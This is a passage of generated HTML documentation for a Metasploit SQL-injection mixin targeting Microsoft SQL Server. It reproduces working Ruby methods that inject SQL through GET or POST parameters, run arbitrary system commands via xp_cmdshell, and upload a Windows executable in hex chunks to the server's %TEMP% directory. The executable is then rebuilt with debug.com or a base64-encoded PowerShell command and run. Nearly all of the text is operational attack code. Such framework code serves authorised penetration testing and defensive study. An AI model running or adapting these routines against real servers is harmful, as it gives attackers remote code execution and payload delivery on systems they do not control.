<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>cookie</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>COOKIE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>*/*</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='comma'>,</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATA</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html#NoTarget-constant" title="Msf::Module::Failure::NoTarget (constant)">NoTarget</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The SQL injection parameter was not specified in the POST data</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_post_data'>post_data</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATA</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_uri_encode'>uri_encode</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>data</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_post_data'>post_data</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>cookie</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>COOKIE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>*/*</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='comma'>,</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mssql_upload_exec-instance_method">
#<strong>mssql_upload_exec</strong>(exe, debug = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Upload and execute a Windows binary through MSSQL queries</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mssql_upload_exec'>mssql_upload_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_exe'>exe</span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_hex'>hex</span> <span class='op'>=</span> <span class='id identifier rubyid_exe'>exe</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_var_bypass'>var_bypass</span> <span class='op'>=</span> <span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='id identifier rubyid_var_payload'>var_payload</span> <span class='op'>=</span> <span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Warning: This module will leave </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe in the SQL Server %TEMP% directory</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Writing the debug.com loader to the disk...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_h2b'>h2b</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HEX2BINARY</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HEX2BINARY</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_h2b'>h2b</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>KemneE3N</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_h2b'>h2b</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\n</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_line'>line</span><span class='op'>|</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_line'>line</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Converting the debug script to an executable...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c cd %TEMP% &amp;&amp; cd %TEMP% &amp;&amp; debug &lt; %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c move %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.bin %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Uploading the payload, please be patient...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_cnt'>cnt</span> <span class='op'>=</span> <span class='int'>500</span>
<span class='kw'>while</span><span class='lparen'>(</span><span class='id identifier rubyid_idx'>idx</span> <span class='op'>&lt;</span> <span class='id identifier rubyid_hex'>hex</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c echo </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hex'>hex</span><span class='lbracket'>[</span><span class='id identifier rubyid_idx'>idx</span><span class='comma'>,</span><span class='id identifier rubyid_cnt'>cnt</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&gt;&gt;%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>+=</span> <span class='id identifier rubyid_cnt'>cnt</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Converting the encoded payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c del %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c del %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Executing the payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='symbol'>:timeout</span> <span class='op'>=&gt;</span> <span class='int'>10</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mssql_xpcmdshell-instance_method">
#<strong>mssql_xpcmdshell</strong>(cmd, doprint = false, opts = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Execute a system command via xp_cmdshell</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 46</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span><span class='id identifier rubyid_doprint'>doprint</span><span class='op'>=</span><span class='kw'>false</span><span class='comma'>,</span><span class='id identifier rubyid_opts'>opts</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_force_enable'>force_enable</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_mssql_query'>mssql_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EXEC master..xp_cmdshell &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_doprint'>doprint</span><span class='rparen'>)</span>
<span class='comment'>#mssql_print_reply(res) if doprint
</span>
<span class='kw'>return</span> <span class='id identifier rubyid_res'>res</span>
<span class='kw'>rescue</span> <span class='const'>RuntimeError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>if</span><span class='lparen'>(</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>xp_cmdshell disabled</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_force_enable'>force_enable</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='kw'>retry</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="powershell_upload_exec-instance_method">
#<strong>powershell_upload_exec</strong>(exe, debug = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Upload and execute a Windows binary through MSSQL queries and Powershell</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 105</span>
<span class='kw'>def</span> <span class='id identifier rubyid_powershell_upload_exec'>powershell_upload_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_exe'>exe</span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='comment'># hex converter
</span> <span class='id identifier rubyid_hex'>hex</span> <span class='op'>=</span> <span class='id identifier rubyid_exe'>exe</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='comment'># create random alpha 8 character names
</span> <span class='comment'>#var_bypass = rand_text_alpha(8)
</span> <span class='id identifier rubyid_var_payload'>var_payload</span> <span class='op'>=</span> <span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Warning: This module will leave </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe in the SQL Server %TEMP% directory</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='comment'># our payload converter, grabs a hex file and converts it to binary for us through powershell
</span> <span class='id identifier rubyid_h2b'>h2b</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>$s = gc &#39;C:\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;;$s = [string]::Join(&#39;&#39;, $s);$s = $s.Replace(&#39;`r&#39;,&#39;&#39;); $s = $s.Replace(&#39;`n&#39;,&#39;&#39;);$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(&#39;C:\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe&#39;,$b)</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_h2b_unicode'>h2b_unicode</span><span class='op'>=</span><span class='const'>Rex</span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_unicode'>to_unicode</span><span class='lparen'>(</span><span class='id identifier rubyid_h2b'>h2b</span><span class='rparen'>)</span>
<span class='comment'># base64 encode it, this allows us to perform execution through powershell without registry changes
</span> <span class='id identifier rubyid_h2b_encoded'>h2b_encoded</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_h2b_unicode'>h2b_unicode</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Uploading the payload </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>, please be patient...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_cnt'>cnt</span> <span class='op'>=</span> <span class='int'>500</span>
<span class='kw'>while</span><span class='lparen'>(</span><span class='id identifier rubyid_idx'>idx</span> <span class='op'>&lt;</span> <span class='id identifier rubyid_hex'>hex</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c echo </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hex'>hex</span><span class='lbracket'>[</span><span class='id identifier rubyid_idx'>idx</span><span class='comma'>,</span><span class='id identifier rubyid_cnt'>cnt</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&gt;&gt;%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>+=</span> <span class='id identifier rubyid_cnt'>cnt</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Converting the payload utilizing PowerShell EncodedCommand...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>powershell -EncodedCommand </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_h2b_encoded'>h2b_encoded</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c del %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Executing the payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='symbol'>:timeout</span> <span class='op'>=&gt;</span> <span class='int'>1</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Be sure to cleanup </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
<div id="footer">
Generated on Fri May 8 17:01:54 2026 by
<a href="https://yardoc.org" title="Yay! A Ruby Documentation Tool" target="_parent">yard</a>
0.9.37 (ruby-3.1.5).
</div>
</div>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink